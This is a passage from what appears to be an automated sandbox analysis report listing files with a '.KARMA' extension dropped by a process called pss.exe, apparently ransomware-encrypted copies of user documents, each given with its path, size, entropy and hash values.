SHA-512:E940CB434E5BF1E0ACBCDDAE87BEF470828F98C63805FA46352EBE7B1BF4AB7C8E57BD9CAC9ABABC034EDED4B15516A99F8BF5195E1B7869ED47B65B2BCE26C6
Malicious:false
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811268651205095
Encrypted:false
SSDEEP:24:TcINH4hlvMOURXwhd4KQyZasE9qvsDksCNWvalB5ciKpuB2nrlECi:4MH4hlvMOewhmy9eqE0WKBguBcECi
MD5:D6F84671D3DEA6E9B75165C041109374
SHA1:11D9692F5AA943E1E8FE38C8CB2025E58CA79064
SHA-256:6B31F2ECE9588DD723D3B34528F4706ED7195D4999B0D1B376352130AC9E5BC0
SHA-512:A9FCEAD3B3FC919779AE0FD77A5D58EF024AB1FAB03B1505CB36769B45A52A94E95338CC40458D427D865C6949617A0CDB5D20606C9F149A2248CE662302F099
Malicious:false
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81757232025939
Encrypted:false
SSDEEP:24:z4e+k0389GfD+T18fJLZTLFoEia6enyxhOQ5b9aVQGALoJ1t37Oora:zPw88fD+58rAaTyxsQcVQGh5/ra
MD5:B2C63A14DC226E90C5A776E69BC45107
SHA1:1A93EDFFDB5C80B862DE173C8D2B8FCF4AB50C4F
SHA-256:FC409361EF65E56F6C4F5805C2B5611CF59EE6781AB76C83BAE86DC318D3AE4F
SHA-512:203503F68EB9D178A1A31ACCA5BD30816699B71E803CD1850A5C03F571147031C69D2A83EE7EFDB50914ACD5E3D99D7F18E2C6A01028644D48B9F52E211F56CA
Malicious:false
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819987576366232
Encrypted:false
SSDEEP:24:uGzPF3iVmoJIX35dkd6FZltCWaKnIiZI7kELHpkKxsRQFeIXdc9vxsXiK:nztSVmN52d6FZmW5IfkQyMVc9eXT
MD5:134009ABA8DCD310E3DEE8AF045F6874
SHA1:B33A3F4105BF6301BA3546C6FFD88797B07CAC79
SHA-256:8B1EA5DC0B36FF110928A3337D4BB9DF983DAC6E576A0FEF0F079673E46E57F0
SHA-512:905FBB1F543AD6CF7A65E49713812FE7B40A1630289A3561C2CF77CE6581C98455B6B68D4DEB333FFF0FF01EC836EC2ABDE0F6512A770DB6FC5CAB93A705A910
Malicious:false
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836297220820901
Encrypted:false
SSDEEP:24:PYX48nATwYDZ0h88hqu2/gghYd0UuGPAr3YQuyNX5qlc3om:m4YAE9u8hqumYTf4bYhc3om
MD5:1AEEC87A119B9D92DA70AFC39ACEBF6B
SHA1:098CAC0893D447E3A0AFCAF550C724B5EB228B28
SHA-256:0B1C7EF9C64707CB9DBC4CD3962B16C386C7DB394D74FAE249D9C1114400DBD2
SHA-512:FBE227F3414BA8420CAD83530761BFADA2BC6BEE409E21F7DBF73D122007A1A1CD9D83A457E1A6FC5672D98F83AE735B869E1E385C01CE6CE838C412A74150E2
Malicious:false
C:\Documents and Settings\user\Desktop\QNCYCDFIJJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814016358271029
Encrypted:false
SSDEEP:24:7uqTzUsCayQ2qdYcHkH7UbXxSbCR3WHhv74J9ODTz:7uiCpQ2oYcEbhC5Wx74fOXz
MD5:063FA7A40F8847FB0D80EE0E8AC73447
SHA1:95A8A90FA2B97E5B432E8938018C51A312C8CCCB
SHA-256:6B22A1E7C07445F43A2857DE8365132B2967E92EADFAF2626FE6178F8469FC74
SHA-512:E9788BF6943A5ED93674306C98C5CD76B5EADD43B991B96A09C1786B3F2669FB61C05395D05C7A250305A75C468CFA54E019E9927D27AB047196EC23A8F454C4
Malicious:false
C:\Documents and Settings\user\Desktop\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802170980754228
Encrypted:false
SSDEEP:12:Q8qgZZBsNHhM4TqlFQfijgza6wr8oc+oHp+hYqlJAeXOB7TM5ZAnMj4ZgCsnmCny:6gv/4KCKiavr8oc+uAhYQLXiAaA4yZA
MD5:1F8A53729FA04BA72E8157F54A8FB6C1
SHA1:9716FFC0FBFFDA8075904C25B7BB7220E183FA35
SHA-256:DFB2886CB00065B81B8603B3C25C002007773194DD330938C4BF7ED41EC04376
SHA-512:320F543C24126E5EB202DCDA62119CE1C60BE0DA1B3D7A6DCE1BDD0518CD2D4C6EBC5E24E5106688A7F1E44B15B080A4D9CF531B78C0E023EB5C8F30F87EEB12
Malicious:false
C:\Documents and Settings\user\Desktop\SQSJKEBWDT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.815072333316551
Encrypted:false
SSDEEP:24:vaVT2jq7a1EKEjjqDJorVh7NOKnizW3pdyws5PVf1xkcSHz:O2UOEzjeorN7Ksby35tNcz
MD5:9C523DFF5B5ADA1CE3FDC2E8A0479AAD
SHA1:64FB9BBCF46DFCA6CA5F46706510CC587D23836B
SHA-256:B1FA5F4F069272C701CF931AC5250B6CB30609F623F2CB45F3F4D9D273E21A57
SHA-512:5EF5E74715C8D7DEF8F4539B042F474DB13134935F1547D62C58ED31083B02BB01D564208916E776D44F20B4B9F7BCAD32FEC53EAB3E33CD8C3846329812A22B
Malicious:false
C:\Documents and Settings\user\Desktop\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805569226974544
Encrypted:false
SSDEEP:24:AuW95wHllXXfQR+v45VJmxC29YEXiL7lgHcclRklM+agTHDpSs327Lxz:pI8nnfs+v46qEXiL7SvvkaFgR3+9
MD5:E14BD386F3D926DB3BE076472E487359
SHA1:0BAD4E95351C50406DECB9965F0AC599BB1CAD73
SHA-256:A9EB80C5D668379285B009D6D47D9B5E9AFE11FF3E077AC20D18CC0915F1331A
SHA-512:C6B2B40F350B472701FACFDE15C38D31C1DE3708850F8C46670AEF65DBDA2AB617542964BEB5D683223AE91C2D7256050F8AD9A97B7D18D1E5B4B0DA24A75637
Malicious:false
C:\Documents and Settings\user\Documents\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8483544477333265
Encrypted:false
SSDEEP:24:bSIKr7R7MKNGiRfp8phYILLtc3YH3sxEi:bSIKPjNVFiH1LRIiuEi
MD5:82044CDDF69185B6CC3F5408EB0E5F72
SHA1:0622C895ECF0B48DEB9089799F21375B3883A87B
SHA-256:7CDE1BA681C3B476D8FC20FB221C2967C8D112CE185A39D44A1A6FD3D66FD695
SHA-512:D8C667F3CCED44E4E90840A68A515BBE9C3A940253E2B5080E05501A9EAEB855B0481960A1F6E8EC31F0943690B3530B2D0219066498A661DD94CA6BA046319E
Malicious:false
C:\Documents and Settings\user\Documents\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807591287377502
Encrypted:false
SSDEEP:12:o1ID8PdaVYLRiXKQ+JBo/XgYF5sK9L6a+AXuDU29YecZHAJxkS/rK9Y2KHYOBapo:AIIPdU4GaJBMQmjV+kSl9YHL9Y2KHNh
MD5:44EAFDB13BDD90CDB59FDC3A2D18FF80
SHA1:2AF6D3C14DDB4AE33B03A69F1B14310A55DFA29C
SHA-256:32D5A008B43FE3D0169F1573C91E6C686124FC4D1FEBE645F2470371E205E1C0
SHA-512:60BCD7614D07CE391FA60A8DFECD2D05AC26E711F7CF4065C79082865A9264FE64C8BCC7BE6A574B91473EBCF3176430DA21BACC370C5F097642781054EC8C3A
Malicious:false
C:\Documents and Settings\user\Documents\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.789259349306412
Encrypted:false
SSDEEP:24:P14kOJ3rE+bqFCcneD6PMGlDc9JkddyiooFkuRSEv7oxLyQR/fDR:P15OJ3rmF7LlCJkeGfoxLymjR
MD5:DA18E7A8B3EAEE39212594F6EB04DDDF
SHA1:B70B9D864163A50E2B7DFDD3D01D2DC0DA52D276
SHA-256:D4EB85C16EF36C37813CD9EA1D92A3C456D61BC272304F9EB7103B8CA40C4900
SHA-512:007DC91416CE28A93673496AF60A7B7E282055FD9C64BD2D1EE7AFD0CB8D491B5C55DB525D771D2E00FA24D2E5A4AEE41EB24B2F9426247C00927F80C3FBC782
Malicious:false
C:\Documents and Settings\user\Documents\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.798729109296202
Encrypted:false
SSDEEP:24:KgftBdZeNSTYGQTJF8UavbNWkkVk3XPt9pZ:KefYSTYdSNWkkC3XPrD
MD5:AC9A0B8D2CBBC0A80BB999A18361EFB3
SHA1:F0BB870381F3E21D8C5B6A02FB95B785D363657C
SHA-256:765138565F06A3DEC53D15BE016837E52F97DAA6726352768CD9CBE0A1B64D34
SHA-512:C2ABED670C641D12420E80EAC498AA87FF79E178992F3D8F39BBF5F5882AF77A752DDB4F17E922CAC79BD6690967123E76C3850DE0C9F47B206AFDEA0AFDB595
Malicious:false
C:\Documents and Settings\user\Documents\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807179350599828
Encrypted:false
SSDEEP:24:BRJ6PoB7efny4CIFGky15tbp6PbqwSq9Y9bE0bNpzziHLl7uAvMfi:p6PoB8yEGkyPREP/l9EbnpzzKvN
MD5:C34523ECF1594EFCF11DC45D9F470BBA
SHA1:2F5999B8D5B82821CA3E0D3311D0D67E3229AC78
SHA-256:B504050A55A0BE33C2563E623EEE097193748722FEA26CE413C501B8B4990150
SHA-512:F900B285D7191875856A9A61F568BB01F1E0F2A92881AE2E5CF8F1267475F760EA7093ADC303C1D9E6C730AB3D600C7318FB5BF721A19C1DD6F12A64B5F14AC1
Malicious:false
C:\Documents and Settings\user\Documents\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808229798797674
Encrypted:false
SSDEEP:24:Py6HzcPt0fhLlnbwA7t/uPjUF3BCEt6Cm+sg2fVl4DytUw2Y:PZzatchLlnbwA5u7UF3t1l25iY
MD5:E0BCB0E19DCF4D66D9386AFA3D2D8572
SHA1:DBF9AFF1277807C92E41764B0F4C0D60C317917C
SHA-256:5A5988D465B3713A7242620003A20835EAF4D45369CB5CDDE6C4671D54B2BE56
SHA-512:4BDD75967F754D6E8E6EAA44A213ECFB18EE050118B337731BA26D13480546E9842D02B1AF7DF1B42BC04A9C02BAFC7D413250461F64035706E6618144EBDE3C
Malicious:false
C:\Documents and Settings\user\Documents\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820764315499837
Encrypted:false
SSDEEP:24:1BxPhz8B2uFaWKi8VTqB3OnIPgU1VTQHz4EaISArtT5t:/IB5Ci8U3OnogUnTgz4Nwrhb
MD5:F0E2463BE3320B989A2101E8DC426920
SHA1:32CC532557985E757965BE70F50A0A15DC8F30D7
SHA-256:15703CAFF9B47841C9BD7DA3B0714BB97F6654F025063A5E1C1CB6299B856A6B
SHA-512:FAE3EC695914C208C7438C0922A14E15B47C16592F71468C3560F5F02C6771563985DD4819CB6CAD875266C03C71FAA3251BFE50C7BF583DF8A3EA362F7E505A
Malicious:false
C:\Documents and Settings\user\Documents\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8309656220719575
Encrypted:false
SSDEEP:24:kvnBe7/TS7GrIYinLEnQpmN06IpOr7h202UUEoj48G9:4nBe7/e6rfiwnXu6AO3kljjg9
MD5:50C5BAB77C71B5636CEAD09194606F7A
SHA1:4A272025FD2A92CD26FDCAD3C87162560F9C5FA5
SHA-256:8687FFF0371544BD5D4A1AD77D62F6C043C9070C928129922F575E9ED0B1AE32
SHA-512:4C3EDE3E0DD6FBCC3D5CEB9E97E94C7CF8BC314F7B42809C77BE610AE8A2C20E0D14423AEEC5A7BE30D853F8BEC7F887E4EFBD626EF2753C36AA2775D8B6CE2C
Malicious:false
C:\Documents and Settings\user\Documents\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.80717479311287
Encrypted:false
SSDEEP:24:KKyoR0yYmBixtK97eGkNNXFgzzXP423Y8wEb+WcwNNk7Er2:KllfWHo2zXPNInESma
MD5:01CF78C85B368E01A5D6746C05971D08
SHA1:DB13E5E8523DE58640AEBBA82C66AEC34BF5C6C7
SHA-256:B353236E5E7914DE49D939F02CF57421CCD9C350D0E30189791AB33BDF332A8E
SHA-512:7D99E7B1927348AB248B6845FE3FEF150C7DC1E2FBF21718D3B073C85AC9866AC6B5B09838264687978273F7E8AA849A8E7C733E4BFB604F8BE2FCDD596790E5
Malicious:false
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8280602413678
Encrypted:false
SSDEEP:24:j0rLVK6HOyiQyifFr7LAHebKgqDLh17h9lHbU99M4hZ:j0rLE6uDaPLAHeGvDLh1nFUr
MD5:BB63825AA70EA0FDD2818D2A7B166363
SHA1:35DFF0E9847C8C08DB5E7BA9C3F9DCB87908E255
SHA-256:D39AF3E5304EA32355808EF46535DFF3760E4B118FEDCA56607C78C09711A24C
SHA-512:3C2F8DD35BA949D31DAD4F48C35180BA7C6B443A227B9A02949F65B272AB2AF59C467EDCCA7D0B3DF779D5430EF45140BA31B2CF841A3A247846AB0EEB6A171A
Malicious:false
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.827362631974762
Encrypted:false
SSDEEP:24:JSh+v4MIeFnMoPOjiTmz1uPkqI0u5pceikmDnp9o0CE720V6/cTD:JSKxIeFnMorT97I0hlkm40V720VL
MD5:60916CECAF96353BD206316F41567952
SHA1:6A0F0C4529A076A7F9DECF168526F0891837AA9A
SHA-256:17D31B810FF5703EAB936E8BC14325D6AABEC048C68D18D0BBAD376C6B21903F
SHA-512:DA193A154467C5C5B2D9CA2E302E3A949EC57B9BE3882602C202E0B117BF3F92ED4B70D9F8D3690BD9CA6B4E21124B00389A900120F05C017A0CE20C4C6E47F5
Malicious:false
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808696676583605
Encrypted:false
SSDEEP:24:CsOtEhpeQyQDne9J0oxPV0RI7gNSL7Nl7HlZQSkHBD8slEdI:CFnQL80r8L7Nl0qslEi
MD5:62A3150DAFD2222B09E019BEB187C7C0
SHA1:528260B86AA2DA8615B1367C450F4EFC850F1416
SHA-256:1780B6E965FC7850F52D888090CE09866204EB5C6A56362B8547FC671897EBA1
SHA-512:1E950212A4708BC16E4CA6AE88FF21C9F49CC9D46C3868A3A2FCFFEC65000B2BB2D455D917A04FF6DBD9627200627AF82362F4D7E5265E35EA4261FD3BFD5F5E
Malicious:false
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829407730277449
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82386632332941
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799274125397833
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81205410196831
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802428226492806
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.821623393781539
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813433140922798
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820970459397875
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799303533827198
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819475330846343
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:SysEx File -
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829261338930429
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832926575046884
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.831178858085952
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805470265535074
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832398142121143
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81402376433519
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.842261373481898
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82993784832169
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.833223265709336
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826097880997593
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812069223185366
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Documents\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.791417124081268
Encrypted:false
SSDEEP:24:AhXV8GitS5U+GeZHs8vRWagm1kU+Pm9kgAbtznU728X9+4ZO0t:Afith+GKM8vRWa7F+AkxZw7N9Ue
MD5:9211F25FDA9480968F25D3A83BB5067C
SHA1:F9DB8957D4C0669835F4CE04B24CA04C2575C9DD
SHA-256:2D46C8A54BD29269C058110D5F3B0843C5BAB836B84050457E93FA222D994B38
SHA-512:CA3A7DD80571441A3204565D66DABD6354540ED4EC3D1A43C7FEB99839905357D6B5D41C0C80CD706E6C2C8302FB6EB65ABE257FBEB79FBED86C693C9C1DD612
Malicious:false
C:\Documents and Settings\user\Documents\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840548231736773
Encrypted:false
SSDEEP:24:CYw5AzY8u4SLZFqQtwWmu4A4ABRWRXY96DKsNi4if1DumiZ/qyksNmTX:3w5WYaSLXqZIxzMXY9BsUhf1wCyksgb
MD5:ED61314F5F0FFB14881AD2FFAE63AD4C
SHA1:351324EA57499EF27DA3CA3A43FB0C4D97937CFA
SHA-256:B50E271005A4E2C436771D1572A3A15C5C01C3277B6DD64415F615AA848E0A0C
SHA-512:DBFBC8A65A26DC84B2B2E90E50465E9A8BA58CB604D172FDA1718E7016896007DF169286C67C51D6764E6539AA407327365694C0582243400BFB6BABA1DA41E2
Malicious:false
C:\Documents and Settings\user\Documents\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828959280386013
Encrypted:false
SSDEEP:24:YxOk/cxqSmLZj9C/e9KL1v+z/kOHtmAHT5bIa0CAHoG2AyWQ1+yISu4P0C:Y4k0sSmp9CFLB7Qt1zSVGGvyWQoyIJ4l
MD5:3D847B9B44072174582F31B1FA411AAE
SHA1:E15CFFDD576583FE0DB29C79FD0E47FAFD5852F0
SHA-256:FB564FB20E6B5D339E2444DB98512E69431BAF1B46AB3647BB937497736769D0
SHA-512:3A17A6A3394E905AA1CD5ED2735F89E66C074E2CDFDA3A81DCE7F528FBBAB5374201374BD001254FDF52CB392F0252A65E5E5D01CEB6FB006F714F89FA3B4416
Malicious:false
C:\Documents and Settings\user\Downloads\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81860388624575
Encrypted:false
SSDEEP:24:4XQHAyCiR9yuvEysdz/GuHEIQOzprOMwODNR/szl+NzkDNja/dHf:4XQHAynyAsZLHE88Mp/szl+N6M
MD5:12BBF409D907DF02E884729223C52AF1
SHA1:07B005F936504358ECBCA872FB2930270C628506
SHA-256:99597378781A2D85C81D71F447D5F016A6C691D24FAFB77E5692F87F0C38A093
SHA-512:277E94EC6F327F6B348858AB6B70BD979DF250B964300AC33D174DCE7D6650673879701394AF175200824959A3F11E7FAF57B9A1A12802091710CD73F22E6E69
Malicious:false
C:\Documents and Settings\user\Downloads\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.7788102223269595
Encrypted:false
SSDEEP:24:p5NeCU9ZellXhfa0RON16zityxrA9yFzyqdlxqfTk9G6xaBFh8XeQfK:lJUnGbfbQWOu0CWWlxqrk91xKL83i
MD5:0AD8C0A21411886F6A039D6FA22D8B24
SHA1:82D453B2C5D36F597491A80AB25D694C53AD763F
SHA-256:3B45A80C51D699A4D75089D0103CEEC50A60F580EDA60A891F31A5608CEC6C37
SHA-512:FE0E5F969D671C9C24FE6C7863BC35644732077BC135C23DC019A71781CDA7F7CD0D766EEFF86E9F8BEC8B7B8E3DE418367A3DCF18F070DD39E0703CA9853F30
Malicious:false
C:\Documents and Settings\user\Downloads\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81284245460368
Encrypted:false
SSDEEP:24:sTNyGquO8mM0PjnFG9nonYyWqwtGGbQzG/QSz9Uom7YMYw:W4uOg0eFqwrn/Qg9q73
MD5:7ABB55513973EEF9C6FE7051FDE2CD72
SHA1:01C7F9ACF20AAA847B8BFD795543E46F113F89C3
SHA-256:AD90946F5CCD84818257FA598A10E2263DD2329E9B792A1018B113A36D29B5DD
SHA-512:FB2A22E857A1F3C6A04F8909B8D311CE73A25FCE798C9CAE6E20B7CA9CAA82D19A6F31F4F108BE4C5CB0AC4DF32F2BE0E9CDFD2FCC33CD94C83DAB6F28261BEE
Malicious:false
C:\Documents and Settings\user\Downloads\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.851850114234256
Encrypted:false
SSDEEP:24:/LrIVgADmvqWN4KBwVYjjtqaM1x7xFPsx0wvdozI8+wa:Trc44KBwVYj5U1RPavGz3g
MD5:0C009BF92371C3E64F9DCEB4EE37C524
SHA1:2A112878005FE01A389D737745FF8D30BF599A3F
SHA-256:E5266C20F1B7410B18FC54924BC80DB588861A5D4FAEDC0D90B4E212E085F8A3
SHA-512:D925AB67B09EDF9966A792C0CE247E9E63CC9305961AB32121611E4AB2782630CC05DCBAF06A18DDFA20F5AEB7789DEC559AD8275A345C3E1FCEE2998F76BDDF
Malicious:false
C:\Documents and Settings\user\Downloads\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840201262589571
Encrypted:false
SSDEEP:24:PTvXies9I0SSgaQqhLUlXvUObKyGDyFw7ljiKs7bgN/Q:7yewrSZaUVvGVDyu7FiKsvC/Q
MD5:7762601B8C810D88740782756F94116E
SHA1:2A6B27A9D790520F7AF9FB7A8B660738671AEBF9
SHA-256:0638FFAB2E85DD8EA7BF3EA4282FF77B0C87A0D8D465A206AA4ACF0C32FBC47C
SHA-512:A3AEC0320FAB2F515F210025EA118CD862473740412A4499CF23DECA0213769BC75D13F3E9F54A475721F591B256069185BBEFC1E2A4E6B0BF4DC42C00E67139
Malicious:false
C:\Documents and Settings\user\Downloads\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826497789071994
Encrypted:false
SSDEEP:24:BQXsPHdhz4w4TTe1CtIisksICMmWfyBnSit30I7Qh:e+4TTTe4tIDk9CjWfyBSit34
MD5:93929BA2C827B99CC4EF642DCCE4055E
SHA1:C01C2794B841E3C1DDCF0F6E499280598C9887A5
SHA-256:3D0D7CCD2F69B136D36C3E2A8C2CDADBD3D519D885C3DBA6EF459668A23CA347
SHA-512:809C46F361129210861F394C0C5E0EB806A34EFE4B3F61B3F60E6E8AE0FC52BB94DE25E5EEFFF9BFB30124E81E7021E90AE76A32A855B6A0934EB1F2CD1DC092
Malicious:false
C:\Documents and Settings\user\Downloads\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836894358080607
Encrypted:false
SSDEEP:24:J66iCkPfgTbT+nf6XbAd94/t8nB3Nn2pQpPMucbn:J1Tk3iXbAb0KJRMucb
MD5:7584833BADBE3A0056938470E2B6094E
SHA1:0D168714AB9B8C10B28CA878FC9E9684B6770D71
SHA-256:CEA087A1DEEA14C97D9D9236E430B99DB398A69F57B792386952177A0F84E646
